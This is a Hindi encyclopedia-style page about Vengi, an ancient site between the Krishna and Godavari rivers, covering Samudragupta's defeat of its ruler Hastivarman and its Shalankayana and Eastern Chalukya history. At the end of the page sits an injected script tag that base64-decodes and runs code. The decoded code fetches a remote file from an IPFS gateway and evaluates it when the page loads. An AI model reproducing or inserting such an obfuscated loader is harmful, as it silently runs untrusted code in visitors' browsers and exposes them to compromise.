वेंगी
भारत डिस्कवरी प्रस्तुति
The printable version is no longer supported and may have rendering errors. Please update your browser bookmarks and please use the default browser print function instead.
वेंगी अथवा 'पेडुवेंगी' एक ऐतिहासिक स्थान था। यह गुप्त सम्राट समुद्रगुप्त की प्रयाग-प्रशस्ति में वर्णित वह स्थान था, जहाँ के शासक हस्तिवर्मन को गुप्त सम्राट ने परास्त किया था-
'वैंगीयकहस्तिवर्मापालक्कउग्रसेनदैव राष्ट्रककुबेरकौस्थलपुरकधनंजयप्रभृति-सर्वदक्षिणापथ राजागृहणमोक्षानुग्रहजनित-प्रतापोन्मिश्रमहाभाग्यस्य च।'
- वेंगी कृष्णा नदी और गोदावरी नदी के बीच आन्ध्र प्रदेश में एल्लौर से 7 मील की दूरी पर उत्तर में स्थित है।
- समुद्रगुप्त के समय वेंगी का राजा हस्तिवर्मन या हस्तिवर्मा था, जो सम्भवतः शालंकायन वंश का था।
- पूर्वी चालुक्यों की राजधानी होने का गौरव वेंगी को प्राप्त हुआ था, किंतु चालुक्यों एवं पल्लवों के बीच इसको लेकर सदैव विवाद रहा।
- दूसरी शती ई. में वेंगी के शालंकायन नामक नरेशों का पता चला है। टॉल्मी ने इन्हें ही 'सलकेनोई' नाम से अभिहित किया है। इससे पहले यहां इक्ष्वाकुओं का राज्य था।[1]
|
|
|
|
|
टीका टिप्पणी और संदर्भ
- ↑ ऐतिहासिक स्थानावली |लेखक: विजयेन्द्र कुमार माथुर |प्रकाशक: राजस्थान हिन्दी ग्रंथ अकादमी, जयपुर |संकलन: भारतकोश पुस्तकालय |पृष्ठ संख्या: 871 |
संबंधित लेख
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>